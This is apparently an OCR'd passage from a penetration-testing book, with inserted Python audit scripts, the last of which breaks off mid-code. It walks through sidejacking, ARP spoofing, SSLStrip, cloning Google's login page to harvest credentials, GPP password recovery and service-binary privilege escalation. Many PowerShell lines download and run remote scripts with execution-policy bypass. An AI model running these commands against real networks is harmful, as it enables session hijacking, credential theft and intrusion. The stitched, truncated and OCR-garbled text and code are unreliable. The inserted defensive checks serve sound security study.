see some examples which take advantage of these attacks. 


Side Jacking: 

From a high-level view, sidejacking is the process of sniffing the traffic, looking for session tokens 
(cookies), and using those tokens to authenticate as the user. Remember that HTTP is a stateless 
protocol. That means it has to use other methods to track your session without a username/password 
authentication for every page on a web application. After you authenticate the first time, a session 
token will be generated for the whole session and now the token is essentially your authentication 
pass. If that session cookie is compromised, an attacker can take those session tokens, import them 
into their own browser and become you. If you are still unfamiliar with sidejacking, you can visit this 
link for more information: 


http://www.pcworld.com/article/209333/how_to_hijack_facebook_using_firesheep.html. 


Hamster/Ferret (Kali Linux) 

Hamster is a tool that allows for these sidejacking attacks. It acts as a proxy server which replaces 
your cookies with session cookies stolen from somebody else, allowing you to hijack their sessions. 
Cookies are sniffed using the Ferret program. 


How to run Hamster/Ferret: 
• First, we enable IP forwarding: 
  o echo "1" > /proc/sys/net/ipv4/ip_forward 
• We then modify IP tables for SSLStrip: 
  o iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000 
• Next, we configure and run SSLStrip: 
  o sslstrip -f -a -k -l 1000 -w /root/out.txt & 
• Next, we need to enable ARP spoof (remember this will ARP spoof everyone on the 
network): 
  o arpspoof -i eth0 [gateway] 
• Next, we need to enable Ferret. In a new terminal window: 
  o ferret -i eth0 
• And finally enable Hamster. In a new terminal window: 
  o hamster 


Now, you just need to wait for a victim to go to a website, authenticate or be authenticated, and for 
their cookies to be sniffed. Once you feel you have obtained their cookies, look at the hamster.txt file 
that was created. In the case below, we see that the victim's Reddit cookies were stolen, and these are 
the session tokens that show up in the right-side of the image below. 
[Figure: left, the arpspoof terminal; right, Hamster output listing the captured cookies for Domain: www.reddit.com, including the reddit_session cookie] 


arpspoof 


Hamster Results 





With the Reddit session tokens, let's see how we can use them to gain access as that user. I copy the 
reddit_session value and add it into my browser by creating a cookie that mimics the 
cookie we stole. I then refresh the page. 


We will use the Firefox Web Developer add-on which we installed during the setup to analyze and 
add our cookies. We can drop down in the Cookies menu and click Add Cookie. As you can see, 
prior to adding the cookie, I am currently not logged in as any user. After adding a reddit_session 
cookie with the proper values, I click OK. 


[Figure: Web Developer "Add Cookie" dialog (Name: reddit_session, Value: the stolen session value, Host: reddit.com, Session cookie checked) over a reddit.com page that is not logged in] 


Replacing Cookies 


Refreshing the page, it looks like we were able to gain access to this account (image below) without 
ever knowing the password! Remember that I am in no way attacking Reddit's site or servers at all. 
The only thing I am doing is sniffing the clear-text traffic, pulling out the cookies, and replacing my 
cookies with those that were sniffed on a network I own. 


[Figure: reddit.com front page after the refresh, now showing the victim's logged-in session] 


Becoming the Victim User 





Firesheep 
I won't talk much about Firesheep since it is an older tool and similar to the example above; however, 
I just want to point out that the concept still exists today. You can read a little more about it here: 
http://codebutler.com/firesheep/. Firesheep is an add-on tool for Firefox which sniffs wireless or 
wired networks for session tokens passed in the clear. In your browser window, it presents a framed 
page where you can click on a user you captured and become that user instantly. You don't have to 
add any of your own cookies manually, but it only works for a limited number of sites. 


The underlying problem is that when session cookies do not have the Secure flag set and the 
connection is not over HTTPS, there is a possibility that the cookies will be passed in the clear. How do you 
check if your cookies are secure? I will first log into my own website and then take a look at my 
cookies. I am using the Web Developer add-on for Firefox to do this. 


[Figure: Web Developer > Cookies > View Cookie Information for https://www.securepla.net/wiki/index.php?title=Main_Page] 

Name: mw_session 
Host: www.securepla.net 
Path: / 
Expires: At end of session 
Secure: No 
HttpOnly: Yes 


Cookie Information and Secure Cookie 


In the image above, the mw_session token, which is used to keep state for the user, is passed with the 
Secure flag off. If the application at any time references information on that page over HTTP, or if an 
attacker can force the victim to visit www.securepla.net over HTTP, the attacker will have the full 
session token and be able to take advantage of the user's access. 
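For both the sidejacking description above and the Secure-flag check on mw_session, an added example that is not the book's code: it parses Set-Cookie headers and reports session-looking cookies that would travel in the clear, which is the condition sidejacking depends on. The sample headers, their placeholder values and the name heuristic are this example's own assumptions.

```python
"""Session-cookie attribute audit: added example, not from the book.

Sidejacking only works when the session token travels in the clear, and the
mw_session cookie in the screenshot above is that case: Secure=No means the
browser also sends it over plain HTTP. This parses Set-Cookie headers and
reports session-looking cookies that lack Secure (and, as a lesser finding,
HttpOnly). The sample headers and the name heuristic are this example's own
assumptions; audit_url fetches a site's real headers.
"""
import re
import urllib.request
from typing import Any, Dict, List, Tuple

SESSION_HINT = re.compile(r"sess|sid|token|auth|login", re.IGNORECASE)


def parse_set_cookie(header: str) -> Dict[str, Any]:
    """Split one Set-Cookie value into name, value and lower-cased attributes.

    Flag attributes (Secure, HttpOnly) map to True; valued ones keep their value.
    """
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, Any] = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def audit_set_cookies(headers: List[str]) -> List[Tuple[str, str]]:
    """Return (cookie name, finding) pairs for exposed session-like cookies."""
    findings = []
    for header in headers:
        cookie = parse_set_cookie(header)
        name = cookie["name"]
        if not SESSION_HINT.search(name):
            continue  # not a session token by name; ignore
        attrs = cookie["attrs"]
        if "secure" not in attrs:
            findings.append((name, "missing Secure: also sent over plain HTTP, so sniffable"))
        if "httponly" not in attrs:
            findings.append((name, "missing HttpOnly: readable by page scripts"))
    return findings


def audit_url(url: str) -> List[Tuple[str, str]]:
    """Fetch `url` and audit every Set-Cookie header in the final response."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        return audit_set_cookies(resp.headers.get_all("Set-Cookie") or [])


# Constructed headers modelled on the two cases in the text: a wiki session
# cookie with HttpOnly but no Secure, and a site session cookie with neither
# flag. Values are placeholders.
SAMPLE_HEADERS = [
    "mw_session=PLACEHOLDER1; Path=/; HttpOnly",
    "reddit_session=PLACEHOLDER2; Path=/; Domain=.example.com",
    "csrftoken=PLACEHOLDER3; Path=/; Secure; HttpOnly; SameSite=Lax",
    "theme=dark; Path=/; Max-Age=31536000",
]


def audit_sample() -> List[Tuple[str, str]]:
    """Audit the constructed headers."""
    return audit_set_cookies(SAMPLE_HEADERS)


if __name__ == "__main__":
    for name, finding in audit_sample():
        print(f"{name}: {finding}")
```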


DNS Redirection: 

If I have a successful MITM within a corporation, one attack that is usually fruitful is to clone the 
intranet page (or any page that requires authentication), then use it for DNS redirection. This is an 
easy way to get usernames and passwords. Let's see a quick example: 


We already know how to configure Cain and Abel to MITM systems in a network from a prior 
example. We will assume you already have a victim routing through you. The next step is to modify 
and spoof DNS requests that happen through the MITM. 


Under the Sniffer top tab and APR bottom tab, click on APR-DNS. Here you can right-click and add 
DNS requests that you want to modify. As mentioned before, I will usually pick an intranet page 
requiring authentication, but in this case, I will spoof Google and their authentication. 
[Figure: Cain APR tree with APR-DNS selected: APR-SSH-1 (0), APR-HTTPS (130), APR-ProxyHTTPS (0), APR-RDP (0)] 

The second thing to do is set up a fake page to grab credentials. To clone the site, I generally use the 
Social-Engineer Toolkit (SET) (I will go through a more detailed example later on in the Social 
Engineering section). Once running within the SET menu, go to: 1 - Social Engineering Attacks, 2 - 
Website Attack Vectors, 3 - Credential Harvester Attack Method, 2 - Site Cloner. 

In this case, I am going to clone https://accounts.google.com/ServiceLogin, which is the universal 
login page for Google, Gmail, Google+, etc. This is configured on a Kali box that has an IP of 
192.168.0.85. 


Cloning Google's Authentication Page 


We have now configured our DNS spoof and set up a fake page. When the ARP-Spoofed victim 
decides to go to google.com, they will be redirected to our SET-cloned webpage. Any usernames and 
passwords will be printed to our screen and users will then be redirected to the real Google page to 
make it look like the user typed the wrong password. 


[Figure: cloned Google Accounts sign-in page ("One account. All of Google.") and the captured credentials in the SET terminal] 


Spoofed Google Authentication Page and Victim's Passwords 


SSLStrip: 
SSLStrip is a tool developed by Moxie Marlinspike that redirects a user from an HTTPS page to an 
HTTP site, so that all traffic can be sniffed in clear text. I would first watch Moxie's talk at Black Hat 
(https://www.youtube.com/watch?v=MFol6IMbZ7Y). The tool monitors HTTPS traffic and rewrites 
all HTTPS communication to HTTP (clear text) from the user. 


Commands on Kali: 
• echo "1" > /proc/sys/net/ipv4/ip_forward 
• iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 
• sslstrip -l 8080 
• ettercap -TqM arp:remote /192.168.0.12/ /192.168.0.1/ 


In this case, we are spoofing the requests from 192.168.0.12 and the gateway at 192.168.0.1. 


[Figure: ettercap 0.7.6 text interface running the ARP MITM] 


SSL Strip 


When your victim (192.168.0.12) goes to facebook.com, it will not redirect to the HTTPS version of 
Facebook for the authentication. In the example below, the user goes to Facebook and types their 
username and password. If we go back to the ettercap terminal, we will see the username and 
password scroll through. 
[Figure: facebook.com loaded over plain HTTP on the victim, and the captured username and password in the ettercap terminal] 


Victim Visiting Facebook.com and Redirected to HTTP and Captured Passwords 


For IPv6 attacks, look at parasite6 in the THC-IPv6 toolkit: 
[link missing]. 


With Any Domain Credentials (Non-Admin): 


Initial System Recon 


So you have compromised your first couple of systems on the SUCK network. The question I get 
asked the most is: What's next? What do I need to do to get more information about the 
system/network and eventually get to the domain admin? You might be on a Windows host and might 
use these few standard queries to get an idea of the environment. 


Windows Enumeration: 
At this point we should know the basic commands like ipconfig, netstat, whoami, etc. to find the basic 
system information. I have compiled most of the basic ones in a single Windows command line: 
• whoami /all && ipconfig /all && netstat -ano && net accounts && net localgroup administrators && net share 


But usually for a penetration tester, this isn’t enough. Before we escalate privileges, we need to 
understand our end system and network much better. 


By now, you know that PowerShell is extremely powerful in a Windows environment, especially for 
a penetration tester. The following commands are all PowerShell commands and scripts, and PowerShell 
is available by default on Windows 7 and higher. 


• Check Windows Patches 
  o Most client machines in a network generally have similar patch levels. Therefore, 
compromising a single host will give you an idea of what other machines will look like. 
This is where you can start targeting attacks for applications, browsers, etc. 
  o powershell.exe -command Get-HotFix 

• Display All AD Users and Associated Information 
  o Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ch 
    Get-NetUser 
  o Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ch 
    Get-UserProperties -Properties name,memberof,description,info 
  o wmic useraccount get /ALL /format:csv 

• Enable Remote Desktop (requires administrative privileges) 
  o Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 0 

• Enable Firewall for Remote Desktop 
  o Enable-NetFirewallRule -DisplayGroup "Remote Desktop" 

• Add a firewall rule 
  o powershell.exe -command New-NetFirewallRule -DisplayName "Allow Inbound Port 80" -Direction Inbound -LocalPort 80 -Protocol TCP -Action Allow 
  o powershell.exe -command New-NetFirewallRule -DisplayName "Block Outbound Port 80" -Direction Outbound -LocalPort 80 -Protocol TCP -Action Block 


• View all services 
  o powershell.exe -command Get-Service 

• Restart a service 
  o powershell.exe -command Restart-Service -Name [ServiceName] 

• Configure the DNS server 
  o powershell.exe -command Set-DnsClientServerAddress -InterfaceAlias "Ethernet" -ServerAddresses 8.8.8.8 

• Get a Process Listing 
  o powershell.exe -command Get-Process 
  o wmic process get caption,executablepath,commandline /format:csv 

• Get a list of all computers from Active Directory 
  o Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ch 
    Get-NetComputers 

• Collection of information from the system, registries, and other sources 
  o Powershell.exe -exec bypass IEX "(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ch 
    Information.ps1'); Get-Information 


Get-Information.ps1 output (screenshot, partially readable): 

Logged in users: 
C:\Windows\system32\config\systemprofile 
C:\Windows\ServiceProfiles\LocalService 
C:\Windows\ServiceProfiles\NetworkService 
C:\Users\cheetz 

Powershell environment: 
Install 
PID 

Putty trusted hosts: 
dss@22:securepla.net 
rsa2@22:192.168.222.129 
rsa2@22:thehackerplaybook.com 
rsa2@22:lethalsecurity.com 

Putty saved sessions: 

Recently used commands: 

Shares on the machine: 



• Search the network for which computers the Domain Admins are using: 
  o Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/chi 
    Invoke-UserHunter 
• Find out which computer a specific AD user is on. In this example, we will look for 
the domain user "domainA" who is a domain administrator: 
  o Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ch 
    Invoke-UserHunter -UserName "domainA" 


[Figure: Invoke-UserHunter output, partially readable] 
Running UserHunter on domain hacker.testlab with delay... 
Using target user "domainA"... 
Total number of hosts: 744 
Target user "domainA" has a session on win7.hacker.testlab 
Target user "domainA" logged into win7.hacker.testlab (192... 





e Finding Open Shares: Once on a domain machine, you want to poke around to 
what’s near you and see what users are sharing. This will download PowerView and 
search AD for hostnames and query those machines for open shares. From the output 
below, it looks like we have access to the admin shares and full c drives of three 
different hosts. 
o Powershell.exe -NoP -NonlI -W Hidden -Exec Bypass IEX (New- 
Object 
Net. WebClient).DownloadString('https://raw.githubusercontent.com/ch 
"Invoke-ShareFinder -ExcludeIPC -ExcludePrint -CheckShareAccess | 
Out-File -Encoding ascii found. shares.txt" 
o And when we read found shares.txt 
o >type found shares.txt 
\\win7_123.hacker.testlab\ADMIN$ - Remote 
Admin 
\\win7_123.hacker.testlab\C$ - Default share 
\\win7_123.hacker.testlab\Users - 


Wwin7 125.hacker.testlabVADMINS - Remote 
Admin 

\\win7_125.hacker.testlab\C$ - Default share 
Wwin8 100.hacker.testlabVADMINS - Remote 
Admin 


\\win8_100.hacker.testlab\C$ - Default share 
\\win8_100.hacker.testlab\Users - 
\\win8_101.hacker.testlab\ADMIN$ - Remote 


Admin 
\\win8_101.hacker.testlab\C$ - Default share 
e What if you want to see all the open shares on your network? Generally open shares 
or files shares have tons of goodies stored in them. These can include configuration 
files, passwords, sensitive documents and more. Invoke-Netview, part of the 
PowerTools suite, is a tool that queries the domain for all hosts, and retrieves open 
shares, sessions, and users that are logged on for each host. Original functionality was 
implemented in the netview.exe tool released by Rob Fuller (@mubix). Note that this 
script takes a long time as it tries to connect to every share and is very loud on the 
network. 
о Powershell.exe -exec bypass IEX "(New-Object 
Net. WebClient). DownloadString(‘https://raw.githubusercontent.com/ch 
Invoke-Netview 
e Another great module of PowerView is the ability to get a list of all Active 
Directory users and the information associated with their accounts. 
o Powershell.exe -exec bypass IEX "(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ch
Get-UserProperties -Properties name,memberof,description,info" 
e Automate post exploitation information gathering? Try Nishang's Get-Information.ps1 
o Powershell.exe -exec bypass IEX "(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ch
Information.ps1');Get-Information" 


[Figure: output of Get-Information.ps1 run with "Powershell -ExecutionPolicy bypass -file Get-Information.ps1", showing account policy, local users, local groups and WLAN info] 
Other Common Non-PowerShell Post Exploitation Commands: 
e Get Local Windows Accounts: 
o wmic useraccount get /ALL /format:csv 
e Find Domain Controllers: 
o nltest /DCLIST:[Domain] 
e List Domain Admins and Local Admins: 
o net group "Domain Admins" /domain 
o net localgroup administrators /DOMAIN 


Domain Trusts 

harmj0y has been doing great work this year. One thing he has been diving into is Windows 
domain trusts. From an offensive perspective, after compromising the first host, you should 
understand the type of infrastructure the target uses. In large environments, the Active 
Directory environment may have trust relationships with multiple different domains. {12} 


We used PowerView throughout the book for the multitude of tools that are incorporated in this 
PowerShell toolbag. One of these tools that helps navigate large organizations is called 
Invoke-MapDomainTrusts. Running this command will show the relationships between the different domain 
trusts. 


For example: 
e Powershell.exe -exec bypass IEX "(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo.
Invoke-MapDomainTrusts | Export-CSV -NoTypeInformation trusts.csv" 

The output: 


hacker.testlab,it.hacker.testlab,ParentChild,Bidirectional 
hacker.testlab,corp.hacker.testlab,ParentChild,Bidirectional 
corp.hacker.testlab,corp.alice.com,External,Inbound 
it.hacker.testlab,hacker.testlab,ParentChild,Bidirectional 
engineering.hacker.testlab,hacker.testlab,ParentChild,Bidirectional 
rockets.testlab,product.rockets.testlab,ParentChild,Bidirectional 
rockets.testlab,it.rockets.testlab,ParentChild,Bidirectional 
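The trust CSV above is small enough to read by eye, but in a large forest it is worth parsing. The Python below is an added example (not PowerView code) that reads Invoke-MapDomainTrusts output with or without the header row Export-CSV writes, flags trusts that cross a forest boundary, and computes which domains a given domain's principals can be granted access in, treating ParentChild trusts as transitive and External ones as not. The column names are assumed from PowerView's output; the rows are the ones shown above.

```python
import csv
from collections import defaultdict, deque
from io import StringIO

# Column names assumed from PowerView's Export-CSV header; the sample rows are
# the chapter's own output, which is printed without that header.
FIELDS = ["SourceDomain", "TargetDomain", "TrustType", "TrustDirection"]

TRUSTS_CSV = """\
hacker.testlab,it.hacker.testlab,ParentChild,Bidirectional
hacker.testlab,corp.hacker.testlab,ParentChild,Bidirectional
corp.hacker.testlab,corp.alice.com,External,Inbound
it.hacker.testlab,hacker.testlab,ParentChild,Bidirectional
engineering.hacker.testlab,hacker.testlab,ParentChild,Bidirectional
rockets.testlab,product.rockets.testlab,ParentChild,Bidirectional
rockets.testlab,it.rockets.testlab,ParentChild,Bidirectional
"""


def parse_trusts(text):
    """Return (source, target, type, direction) tuples; tolerates a missing header."""
    first = text.lstrip().split("\n", 1)[0]
    names = None if first.startswith("SourceDomain") else FIELDS
    reader = csv.DictReader(StringIO(text), fieldnames=names)
    return [tuple(row[f].strip() for f in FIELDS) for row in reader]


def access_graph(trusts):
    """Edges A -> B meaning principals from domain A can be granted access in B.

    TrustDirection is read the way .NET's TrustDirection enum reports it, from
    the source domain's point of view: Outbound = the source can use the target's
    resources, Inbound = the target can use the source's, Bidirectional = both.
    """
    graph = defaultdict(list)
    for src, dst, ttype, direction in trusts:
        d = direction.lower()
        if d in ("outbound", "bidirectional"):
            graph[src].append((dst, ttype))
        if d in ("inbound", "bidirectional"):
            graph[dst].append((src, ttype))
    return graph


def reachable_domains(trusts, start):
    """Domains in which principals of `start` can be granted access.

    ParentChild trusts are transitive within a forest, so the walk continues
    through them; External trusts are not, so the walk stops after crossing one.
    """
    graph = access_graph(trusts)
    seen, expanded, queue = set(), {start}, deque([start])
    while queue:
        for nxt, ttype in graph.get(queue.popleft(), []):
            if nxt != start:
                seen.add(nxt)
            if ttype.lower() == "parentchild" and nxt not in expanded:
                expanded.add(nxt)
                queue.append(nxt)
    return sorted(seen)


def external_trusts(trusts):
    """Trust rows that cross a forest boundary: the first ones to review."""
    return [t for t in trusts if t[2].lower() != "parentchild"]


if __name__ == "__main__":
    trusts = parse_trusts(TRUSTS_CSV)
    for src, dst, ttype, direction in external_trusts(trusts):
        print(f"external trust: {src} <-> {dst} ({direction} from {src})")
    for domain in ("corp.alice.com", "corp.hacker.testlab"):
        print(domain, "can reach:", reachable_domains(trusts, domain))
```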


To find information about members of a given local group: 
e Powershell.exe -exec bypass IEX "(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo.
Get-NetLocalGroup -HostName it.rockets.testlab" 


Since this all comes from harmj0y, I would highly recommend you read: 





Group Policy Preferences: 


In the last book, a great and inexpensive "domain user to local admin privilege escalation trick" was 
through Group Policy Preferences. The Group Policy Preferences vulnerability has been patched in the 
newest Windows versions, but it should still be one of the first things to check. 


Group Policy Preferences is a powerful feature that makes a sysadmin's life much easier by deploying 
GPO settings across the whole environment. One of its features is that you can create/update local 
admin accounts on all the hosts within the domain. Why would someone use this feature? It might be 
because they want to push a new administrative local user onto every host or update the password for 
a local account on every machine (more common than you might think). Once this setting is configured 
and GPOs are updated, all workstations will have this account. The problem is that this 
information (username/password of the local admin account) has to be stored somewhere, and in GPP's 
case it is stored on the domain (in SYSVOL) and is readable by any AD user account. Even worse, the 
AES key used to encrypt these passwords was posted on Microsoft's site, allowing anyone to 
recover the plaintext passwords. {13} 


If you are on a host that is authenticated to the network with any domain user, you can use the 
Metasploit modules with the following: 

e use post/windows/gather/credentials/gpp 
e set SESSION [Session # of your shell] 
e exploit 


This would get you a lot of easy, cheap local administrative credentials, but after the Windows patch, 
I don't see this as often. 
e https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb 
e https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1 
Or if you don't have a shell, just mount \\[Domain Controller]\SYSVOL\[Domain]\Policies, look for 
the Groups.xml file, and decrypt the stored password using: 


http://esec-pentest.sogeti.com/public/files/gpprefdecrypt.py 
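Checking your own SYSVOL for leftover preference passwords is the defensive counterpart to the module above. The Python below is an added example (not the Metasploit or PowerSploit module) that parses a constructed Groups.xml and reports every preference item that still carries a cpassword attribute, without decrypting anything; the scan_sysvol helper, the XML sample and the account-attribute names are constructed for this example.

```python
import os
import xml.etree.ElementTree as ET

# Constructed sample of a Group Policy Preferences Groups.xml (the file the
# chapter says to look for under SYSVOL\<Domain>\Policies). The cpassword
# value is a placeholder, not a real encrypted credential.
GROUPS_XML = """\
<Groups>
  <User name="localadmin" image="2" changed="2015-03-01 10:00:00" uid="{PLACEHOLDER-UID-1}">
    <Properties action="U" userName="localadmin" description="pushed local admin"
        cpassword="PLACEHOLDER_CPASSWORD_VALUE" changeLogon="0" noChange="1"
        neverExpires="1" acctDisabled="0"/>
  </User>
  <User name="helpdesk" image="2" changed="2015-03-01 10:00:00" uid="{PLACEHOLDER-UID-2}">
    <Properties action="U" userName="helpdesk" description="no password pushed" cpassword=""/>
  </User>
</Groups>
"""

# The same attribute appears in other preference files (Services.xml,
# ScheduledTasks.xml, DataSources.xml, Drives.xml) next to different account
# attributes; this list is an assumption covering the common ones.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs")


def find_cpasswords(xml_text, source="Groups.xml"):
    """Return one finding per <Properties> element carrying a non-empty cpassword."""
    findings = []
    for props in ET.fromstring(xml_text).iter("Properties"):
        if not props.get("cpassword"):
            continue                      # absent or empty: nothing stored
        account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), "?")
        findings.append({"file": source, "account": account,
                         "action": props.get("action", "?")})
    return findings


def scan_sysvol(policies_dir):
    """Walk a mounted SYSVOL Policies tree and report every cpassword found."""
    findings = []
    for root, _dirs, files in os.walk(policies_dir):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(root, name)
            try:
                with open(path, encoding="utf-8-sig") as fh:
                    findings.extend(find_cpasswords(fh.read(), source=path))
            except (OSError, ET.ParseError):
                continue                  # unreadable or not XML: skip it
    return findings


if __name__ == "__main__":
    for f in find_cpasswords(GROUPS_XML):
        print(f"{f['file']}: account {f['account']} has a GPP cpassword (action {f['action']})")
```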


OS X Enumeration 


(https://github.com/Yelp/osxcollector) (OS X): 
OS X and Linux detailed post exploitation guides are listed below. In addition to those guides, I 
wanted to integrate how incident response techniques can support penetration testers. Yelp created a 
tool called OSXCollector, which is a forensic evidence collection and analysis toolkit for OS X. 
This tool is used to speed up incident investigations on compromised Macs. As a penetration 
tester, we can use these same tools to automate our information gathering. Let's see this in 
action: 


e curl "https://codeload.github.com/Yelp/osxcollector/zip/master" -o osxcollector.zip 
e unzip osxcollector.zip 
e cd osxcollector-master/osxcollector 
e sudo python osxcollector.py 


admins-MacBook-Pro:osxcollect-2015_04_22-23_28_08 admin$ ls -alh 
total 319408 
drwxr-xr-x  16 admin  staff   544B Apr 22 23:45 . 
drwxr-xr-x   7 admin  staff   238B Apr 22 23:39 .. 
-rw-r--r--   1 admin  staff   3.4K Apr 22 23:39 LKDC-setup.log 
-rw-r--r--   1 admin  staff   347B Apr 22 23:39 VMware Fusion Services.log 
-rw-r--r--   1 admin  staff   155M Apr 22 23:39 osxcollect-2015_04_22-23_28_08.json 
-rw-r--r--   1 admin  staff     0B Apr 22 23:39 stackshot-syms.log 
-rw-r--r--   1 admin  staff     0B Apr 22 23:39 stackshot.log 
-rw-r--r--   1 admin  staff   264K Apr 22 23:39 system.log 
-rw-r--r--   1 admin  staff   6.5K Apr 22 23:39 system.log.0.gz 
-rw-r--r--   1 admin  staff    35K Apr 22 23:39 system.log.1.gz 
-rw-r--r--   1 admin  staff    55K Apr 22 23:39 system.log.2.gz 
-rw-r--r--   1 admin  staff    22K Apr 22 23:39 system.log.3.gz 
-rw-r--r--   1 admin  staff    43K Apr 22 23:39 system.log.4.gz 
-rw-r--r--   1 admin  staff    37K Apr 22 23:39 system.log.5.gz 
-rw-r--r--   1 admin  staff    47K Apr 22 23:39 system.log.6.gz 
-rw-r--r--   1 admin  staff    47K Apr 22 23:39 system.log.7.gz 


OSXCollector Output 


After OSXCollector finishes, a tar.gz file is created with the date timestamp. Extracting the tar.gz 
file (tar xzvf osxcollect-*.tar.gz), we see file output similar to the above. The archive contains all the system 
log files, but more important is the JSON file. What is in the JSON file: 

e Full browser information (history, cookies, login data, etc.) 
e Information about the LaunchAgents, LaunchDaemons, ScriptingAdditions, StartupItems and other login items 
e Information from Mail and more 
e User accounts 
e For full detail see: https://github.com/Yelp/osxcollector 


Why is this important to a red team? Inside this JSON file I have found passwords, session cookies, 
sensitive web browsing data, certificate data, and much more. Luckily, you can do most of this 
investigation offline and reuse cookies to log into sensitive websites. 


Additional Post Exploitation Tips 


Rob Fuller (Mubix) and room362.com have very comprehensive lists on additional post exploitation. 
Post Exploitation Lists from Room362.com: {14} 

e Linux/Unix/BSD Post Exploitation: http://bit.ly/pqJxA5 

e Windows Post Exploitation: http://bit.ly/lem7gvG 

e OSX Post Exploitation: http://bit.ly/1kVTIMf 

e Obscure System's Post Exploitation: http://bit.ly/18dvLOI 

e Metasploit Post Exploitation: http://bit.ly/JpJ1TR 


Privilege Escalation: 


If you end up in an environment with restrictive users, you might have issues moving laterally or 
performing elevated attacks. Without being an administrative user on a host, you are limited in pulling 
hashes, installing software, changing firewall rules, modifying the registry and more. I have dedicated 
a quick section for getting from a regular user to a local administrator in this Zero to Hero section. 


Zero to Hero - Windows: 

After the initial compromise, one of the biggest issues is moving from a regular user to an 
administrative user. As a regular user, you lack the ability to make modifications to the registry, 
install software, bypass UAC, pull hashes, and most of all become SYSTEM. 

In the prior chapter, we talked about looking at open shares for password lists or for configuration 
files. In this section, we will discuss how to look for vulnerabilities and issues on the host system to 
get to system. 


As a member of the Users group with no administrative privileges, we need to look for 
misconfigurations. What are the things we might look for? 


Option 1: 

The first common privilege escalation I see is service executables that have misconfigured 
permissions. We know that services start at boot and call an executable to run in the background. For 
example, think of the Java updater. This runs every time you boot up and checks Oracle to see if you have 
the latest version of Java. It is always running and generally runs as a privileged local account. 


This means that if an executable called by a service is writable by a limited user, we can replace 
it with a file we created, which will allow our new file to execute as SYSTEM every time the service 
starts. 


Luckily for us, harmj0y created a tool called PowerUp to look for these issues. 


To run PowerUp, we will use the standard PowerShell command to download and execute 
Invoke-AllChecks: 
e powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo
Invoke-AllChecks 
PowerUp Example 


We see that the service omniserv is vulnerable to the Write-ServiceEXE issue. How can we confirm 
that we have the ability to write to C:\Program Files\Fingerprint Manager Pro\OmniServ.exe? 


There is a default Windows program called icacls to view file permissions. For example, running 
icacls on this file, we would see output of: 
e icacls "C:\Program Files\Fingerprint Manager Pro\OmniServ.exe" 
C:\Program Files\Fingerprint Manager Pro\OmniServ.exe Everyone:(I)(F) 
NT AUTHORITY\SYSTEM:(I)(F) 
BUILTIN\Administrators:(I)(F) 
BUILTIN\Users:(I)(RX) 
laptop\testaccount:(I)(F) 
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) 


For this file, we can see that Everyone has (F) or full access to modify this executable. If we can 
replace this service file with another service executable, we can potentially take advantage of system 
privileges. 
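To turn that manual icacls read into a repeatable check, the following Python is an added example (not PowerUp code) that parses icacls output for a service binary and reports which low-privilege principals hold write, modify or full rights on it. The sample output is the OmniServ.exe listing above; the set of low-privilege principals and the list of write-capable rights are assumptions made for the example.

```python
import re

# Constructed sample: the icacls output quoted in the chapter for OmniServ.exe
# (icacls prints the first ACE on the same line as the path, the rest indented).
SERVICE_EXE = r"C:\Program Files\Fingerprint Manager Pro\OmniServ.exe"
ICACLS_OUTPUT = r"""C:\Program Files\Fingerprint Manager Pro\OmniServ.exe Everyone:(I)(F)
                                                       NT AUTHORITY\SYSTEM:(I)(F)
                                                       BUILTIN\Administrators:(I)(F)
                                                       BUILTIN\Users:(I)(RX)
                                                       laptop\testaccount:(I)(F)
                                                       APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# One ACE: a principal, then one or more parenthesised groups of flags/rights.
ACE_RE = re.compile(r"^(?P<principal>[^:()]+?):(?P<flags>(?:\([^)]*\))+)$")
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# Simple and specific rights that let the holder change the file or its ACL
# (assumed list: full, modify, write, delete and the specific write rights).
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WA", "WEA", "DC", "WDAC", "WO"}
# Principals every standard user is a member of (assumed list).
LOW_PRIV_PRINCIPALS = {"everyone", "builtin\\users", "users",
                       "nt authority\\authenticated users", "authenticated users",
                       "nt authority\\interactive"}


def parse_icacls(output, path):
    """Return [(principal, set_of_rights)] for every ACE in `icacls <path>` output."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.lower().startswith(path.lower()):   # first line carries the path
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue                                # blank line or summary line
        rights = set()
        for group in re.findall(r"\(([^)]*)\)", m.group("flags")):
            for token in group.split(","):
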